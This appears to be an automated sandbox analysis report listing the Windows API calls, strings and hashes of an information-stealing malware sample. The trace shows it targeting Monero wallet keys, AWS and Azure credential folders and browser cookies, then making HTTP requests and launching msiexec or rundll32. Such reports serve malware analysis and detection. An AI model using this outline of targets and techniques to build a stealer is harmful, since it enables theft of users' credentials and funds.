                                        • lstrcat.KERNEL32(?,007D1578), ref: 007BD35B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD36E
                                        • lstrcat.KERNEL32(?,007D157C), ref: 007BD37D
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD390
                                        • lstrcat.KERNEL32(?,007D1580), ref: 007BD39F
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD3B2
                                        • lstrcat.KERNEL32(?,007D1584), ref: 007BD3C1
                                        • lstrcat.KERNEL32(?,00000000), ref: 007BD3D4
                                        • lstrcat.KERNEL32(?,007D1588), ref: 007BD3E3
                                          • Part of subcall function 007CAB30: lstrlen.KERNEL32(007B4F55,?,?,007B4F55,007D0DDF), ref: 007CAB3B
                                          • Part of subcall function 007CAB30: lstrcpy.KERNEL32(007D0DDF,00000000), ref: 007CAB95
                                        • lstrlen.KERNEL32(?), ref: 007BD42A
                                        • lstrlen.KERNEL32(?), ref: 007BD439
                                          • Part of subcall function 007CAD80: StrCmpCA.SHLWAPI(00000000,007D1568,007BD2A2,007D1568,00000000), ref: 007CAD9F
                                        • DeleteFileA.KERNEL32(00000000), ref: 007BD4B4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                        • String ID:
                                        • API String ID: 1956182324-0
                                        • Opcode ID: 6c36a2c8d67d5b95a567be5efa9330b4cb9e4bd2492b9510668b94330ce48503
                                        • Instruction ID: 08636a8eb8e097572efbeea7ef13bf98958c6961dbe083537e56927c6de22002
                                        • Opcode Fuzzy Hash: 6c36a2c8d67d5b95a567be5efa9330b4cb9e4bd2492b9510668b94330ce48503
                                        • Instruction Fuzzy Hash: E0E1FCB1910108EBCB14EBE0DD9AFEE7339AF54306F10455DF107661A1EE39AE09CB66
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                          • Part of subcall function 007CAC30: lstrcpy.KERNEL32(00000000,?), ref: 007CAC82
                                          • Part of subcall function 007CAC30: lstrcat.KERNEL32(00000000), ref: 007CAC92
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                          • Part of subcall function 007CACC0: lstrlen.KERNEL32(?,016588B8,?,\Monero\wallet.keys,007D0E1A), ref: 007CACD5
                                          • Part of subcall function 007CACC0: lstrcpy.KERNEL32(00000000), ref: 007CAD14
                                          • Part of subcall function 007CACC0: lstrcat.KERNEL32(00000000,00000000), ref: 007CAD22
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0165D098,00000000,?,007D1544,00000000,?,?), ref: 007BCB6C
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 007BCB89
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 007BCB95
                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 007BCBA8
                                        • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 007BCBD9
                                        • StrStrA.SHLWAPI(?,0165D050,007D0B56), ref: 007BCBF7
                                        • StrStrA.SHLWAPI(00000000,0165D170), ref: 007BCC1E
                                        • StrStrA.SHLWAPI(?,0165DB20,00000000,?,007D1550,00000000,?,00000000,00000000,?,01658AB8,00000000,?,007D154C,00000000,?), ref: 007BCDA2
                                        • StrStrA.SHLWAPI(00000000,0165D9E0), ref: 007BCDB9
                                          • Part of subcall function 007BC920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 007BC971
                                          • Part of subcall function 007BC920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 007BC97C
                                        • StrStrA.SHLWAPI(?,0165D9E0,00000000,?,007D1554,00000000,?,00000000,01658AE8), ref: 007BCE5A
                                        • StrStrA.SHLWAPI(00000000,01658A18), ref: 007BCE71
                                          • Part of subcall function 007BC920: lstrcat.KERNEL32(?,007D0B47), ref: 007BCA43
                                          • Part of subcall function 007BC920: lstrcat.KERNEL32(?,007D0B4B), ref: 007BCA57
                                          • Part of subcall function 007BC920: lstrcat.KERNEL32(?,007D0B4E), ref: 007BCA78
                                        • lstrlen.KERNEL32(00000000), ref: 007BCF44
                                        • CloseHandle.KERNEL32(00000000), ref: 007BCF9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                                        • String ID:
                                        • API String ID: 3744635739-3916222277
                                        • Opcode ID: ec61d59d2f613c576db77b4f25beae4be0505c4bae58a9c1405663cd0d9a74db
                                        • Instruction ID: 7294dc5eb60fa3c6c8002fb3ce7aaf6a398d61f73d8733f5c125d3c0021e5d16
                                        • Opcode Fuzzy Hash: ec61d59d2f613c576db77b4f25beae4be0505c4bae58a9c1405663cd0d9a74db
                                        • Instruction Fuzzy Hash: 63E1D5B2910108FBCB14EFA4DCAAFEEB779AF54305F00419DF10666191EF386A49CB65
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • RegOpenKeyExA.ADVAPI32(00000000,0165B948,00000000,00020019,00000000,007D05BE), ref: 007C8534
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 007C85B6
                                        • wsprintfA.USER32 ref: 007C85E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 007C860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 007C8629
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseOpenlstrcpy$Enumwsprintf
                                        • String ID: - $%s\%s$?
                                        • API String ID: 3246050789-3278919252
                                        • Opcode ID: 06ebe2f1dc06a31cbc464310f0f25e217ad4c15603559302078588c2fa6f9870
                                        • Instruction ID: 4662f802b0ce77930a095974031bc31367c2f2abdf1ebef39f301a01c8c6746d
                                        • Opcode Fuzzy Hash: 06ebe2f1dc06a31cbc464310f0f25e217ad4c15603559302078588c2fa6f9870
                                        • Instruction Fuzzy Hash: 90811AB191011CABDB24DF90CD95FEAB7B8BB08704F1082DCA109A6190DF74AF85CFA5
                                        APIs
                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 007C91FC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CreateGlobalStream
                                        • String ID: `d|F$`d|F$image/jpeg
                                        • API String ID: 2244384528-1389507572
                                        • Opcode ID: 576e87e77b2e4d68ef70bc3b536633dcc19bd713749b596d4a4c8ba791c668ce
                                        • Instruction ID: 77bcd7bcd431959182ca7df8cda5e35d9de991cea23d6ffb19636b7d569e9b3c
                                        • Opcode Fuzzy Hash: 576e87e77b2e4d68ef70bc3b536633dcc19bd713749b596d4a4c8ba791c668ce
                                        • Instruction Fuzzy Hash: BE71A771A14208EBDB14DBE4DC99FEEB778AB48700F608508F616A7290EB74E905CB61
                                        APIs
                                          • Part of subcall function 007C8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 007C8F9B
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C5000
                                        • lstrcat.KERNEL32(?,\.azure\), ref: 007C501D
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4B7C
                                          • Part of subcall function 007C4B60: FindFirstFileA.KERNEL32(?,?), ref: 007C4B93
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C508C
                                        • lstrcat.KERNEL32(?,\.aws\), ref: 007C50A9
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC4), ref: 007C4BC1
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D0FC8), ref: 007C4BD7
                                          • Part of subcall function 007C4B60: FindNextFileA.KERNEL32(000000FF,?), ref: 007C4DCD
                                          • Part of subcall function 007C4B60: FindClose.KERNEL32(000000FF), ref: 007C4DE2
                                        • lstrcat.KERNEL32(?,00000000), ref: 007C5118
                                        • lstrcat.KERNEL32(?,\.IdentityService\), ref: 007C5135
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4C00
                                          • Part of subcall function 007C4B60: StrCmpCA.SHLWAPI(?,007D08D3), ref: 007C4C15
                                          • Part of subcall function 007C4B60: wsprintfA.USER32 ref: 007C4C32
                                          • Part of subcall function 007C4B60: PathMatchSpecA.SHLWAPI(?,?), ref: 007C4C6E
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,0165F200), ref: 007C4C9A
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,007D0FE0), ref: 007C4CAC
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,?), ref: 007C4CC0
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,007D0FE4), ref: 007C4CD2
                                          • Part of subcall function 007C4B60: lstrcat.KERNEL32(?,?), ref: 007C4CE6
                                          • Part of subcall function 007C4B60: CopyFileA.KERNEL32(?,?,00000001), ref: 007C4CFC
                                          • Part of subcall function 007C4B60: DeleteFileA.KERNEL32(?), ref: 007C4D81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                         • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                        • API String ID: 949356159-974132213
                                        • Opcode ID: 9ec4a681b127e8f3b3b14acd46bdf15ecc636e6fdba0e9da64632742e4b3b5a6
                                        • Instruction ID: d2d94d69a95cefd0c8cc949b0f59786d98201511af93275d6d4cca2526de04d1
                                        • Opcode Fuzzy Hash: 9ec4a681b127e8f3b3b14acd46bdf15ecc636e6fdba0e9da64632742e4b3b5a6
                                        • Instruction Fuzzy Hash: 2541A3FA940208B7DB64F770EC9BFDD33385B64705F404458B24966181FEB8ABC88B92
                                        APIs
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C3415
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C35AD
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 007C373A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell$lstrcpy
                                        • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                                        • API String ID: 2507796910-3625054190
                                        • Opcode ID: 4b7d96d3e9b78b6a475bee3aea8ece4e73abaadfb881b81395c44d7322281a0a
                                        • Instruction ID: e260d8cc49f2f36df3597bc00bbeda2c11214f2342c27b5a002e19c54dd233d0
                                        • Opcode Fuzzy Hash: 4b7d96d3e9b78b6a475bee3aea8ece4e73abaadfb881b81395c44d7322281a0a
                                        • Instruction Fuzzy Hash: D812EDB191010CEACB14EFA0DDAAFEDB739AF14305F00459DE50666192EF386F49CB66
                                        APIs
                                          • Part of subcall function 007B9A50: InternetOpenA.WININET(007D0AF6,00000001,00000000,00000000,00000000), ref: 007B9A6A
                                        • lstrcat.KERNEL32(?,cookies), ref: 007B9CAF
                                        • lstrcat.KERNEL32(?,007D12C4), ref: 007B9CC1
                                        • lstrcat.KERNEL32(?,?), ref: 007B9CD5
                                        • lstrcat.KERNEL32(?,007D12C8), ref: 007B9CE7
                                        • lstrcat.KERNEL32(?,?), ref: 007B9CFB
                                        • lstrcat.KERNEL32(?,.txt), ref: 007B9D0D
                                        • lstrlen.KERNEL32(00000000), ref: 007B9D17
                                        • lstrlen.KERNEL32(00000000), ref: 007B9D26
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                                        • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                                        • API String ID: 3174675846-3542011879
                                        • Opcode ID: 706fedf6afad9b56a298c9ae272a73e18c0daee95c192b11c041e2869f9d7055
                                        • Instruction ID: db90234ad2579a0e66b9bbece078ad09902062dbbadbe36148bbd94c3e3c44f5
                                        • Opcode Fuzzy Hash: 706fedf6afad9b56a298c9ae272a73e18c0daee95c192b11c041e2869f9d7055
                                        • Instruction Fuzzy Hash: FB515EB1910608EBCB14EBE4DC99FEE7738AF44301F404558F21AA7191EF79AA49CF61
                                        APIs
                                          • Part of subcall function 007CAAB0: lstrcpy.KERNEL32(?,00000000), ref: 007CAAF6
                                          • Part of subcall function 007B62D0: InternetOpenA.WININET(007D0DFF,00000001,00000000,00000000,00000000), ref: 007B6331
                                          • Part of subcall function 007B62D0: StrCmpCA.SHLWAPI(?,0165F1C0), ref: 007B6353
                                          • Part of subcall function 007B62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 007B6385
                                          • Part of subcall function 007B62D0: HttpOpenRequestA.WININET(00000000,GET,?,0165ECD0,00000000,00000000,00400100,00000000), ref: 007B63D5
                                          • Part of subcall function 007B62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 007B640F
                                          • Part of subcall function 007B62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 007B6421
                                          • Part of subcall function 007CABB0: lstrcpy.KERNEL32(?,007D0E1A), ref: 007CAC15
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 007C5568
                                        • lstrlen.KERNEL32(00000000), ref: 007C557F
                                          • Part of subcall function 007C8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 007C8FE2
                                        • StrStrA.SHLWAPI(00000000,00000000), ref: 007C55B4
                                        • lstrlen.KERNEL32(00000000), ref: 007C55D3
                                        • lstrlen.KERNEL32(00000000), ref: 007C55FE
                                          • Part of subcall function 007CAA50: lstrcpy.KERNEL32(007D0E1A,00000000), ref: 007CAA98
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008F9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.000000000091E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.0000000000A86000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000C1B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000CF2000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D17000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D1F000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318472859.0000000000D2E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318810298.0000000000D2F000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318948278.0000000000EC3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318970746.0000000000EC4000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                        • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 3240024479-1526165396
                                        • Opcode ID: 91364f86d43c5abd0f77ab874a6857f5873aa78646c1d298bf410ef90f410968
                                        • Instruction ID: 3e67e30f84857bacd709426a4d6cbde462511046aad7989e7773415ce3434e80
                                        • Opcode Fuzzy Hash: 91364f86d43c5abd0f77ab874a6857f5873aa78646c1d298bf410ef90f410968
                                        • Instruction Fuzzy Hash: 3651D97061010CEBCB18FF64C9AAFED773AAF10346F90445CE50666592EB386F45CB62
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1318211388.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                        • Associated: 00000000.00000002.1318171783.00000000007B0000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1318211388.00000000008ED000.00000040.00000001.01000000.00000003.sdmp
